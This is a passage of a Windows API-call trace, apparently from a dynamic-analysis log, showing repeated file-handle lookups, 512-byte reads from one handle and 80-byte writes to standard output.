returned 0x1 [0235.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.701] GetFileType (hFile=0x4c) returned 0x1 [0235.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.702] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] GetFileType (hFile=0x4c) returned 0x1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] GetFileType (hFile=0x4c) returned 0x1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] GetFileType (hFile=0x4c) returned 0x1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] GetFileType (hFile=0x4c) returned 0x1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] GetFileType (hFile=0x4c) returned 0x1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] GetFileType (hFile=0x4c) returned 0x1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.703] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.704] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.705] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.705] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] GetFileType (hFile=0x4c) returned 0x1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] GetFileType (hFile=0x4c) returned 0x1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] GetFileType (hFile=0x4c) returned 0x1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] GetFileType (hFile=0x4c) returned 0x1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] GetFileType (hFile=0x4c) returned 0x1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] GetFileType (hFile=0x4c) returned 0x1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] GetFileType (hFile=0x4c) returned 0x1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] GetFileType (hFile=0x4c) returned 0x1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.706] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.706] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] GetFileType (hFile=0x4c) returned 0x1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] GetFileType (hFile=0x4c) returned 0x1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] GetFileType (hFile=0x4c) returned 0x1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] GetFileType (hFile=0x4c) returned 0x1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] GetFileType (hFile=0x4c) returned 0x1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] GetFileType (hFile=0x4c) returned 0x1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] GetFileType (hFile=0x4c) returned 0x1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] GetFileType (hFile=0x4c) returned 0x1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.707] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.707] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] GetFileType (hFile=0x4c) returned 0x1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] GetFileType (hFile=0x4c) returned 0x1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] GetFileType (hFile=0x4c) returned 0x1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] GetFileType (hFile=0x4c) returned 0x1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] GetFileType (hFile=0x4c) returned 0x1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] GetFileType (hFile=0x4c) returned 0x1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] GetFileType (hFile=0x4c) returned 0x1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] GetFileType (hFile=0x4c) returned 0x1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.708] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.708] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.708] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.708] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] GetFileType (hFile=0x4c) returned 0x1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] GetFileType (hFile=0x4c) returned 0x1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] GetFileType (hFile=0x4c) returned 0x1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] GetFileType (hFile=0x4c) returned 0x1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] GetFileType (hFile=0x4c) returned 0x1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] GetFileType (hFile=0x4c) returned 0x1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] GetFileType (hFile=0x4c) returned 0x1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] GetFileType (hFile=0x4c) returned 0x1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.710] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.710] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] GetFileType (hFile=0x4c) returned 0x1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] GetFileType (hFile=0x4c) returned 0x1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] GetFileType (hFile=0x4c) returned 0x1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] GetFileType (hFile=0x4c) returned 0x1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] GetFileType (hFile=0x4c) returned 0x1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] GetFileType (hFile=0x4c) returned 0x1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] GetFileType (hFile=0x4c) returned 0x1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] GetFileType (hFile=0x4c) returned 0x1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.711] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.711] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] GetFileType (hFile=0x4c) returned 0x1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] GetFileType (hFile=0x4c) returned 0x1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] GetFileType (hFile=0x4c) returned 0x1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] GetFileType (hFile=0x4c) returned 0x1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, 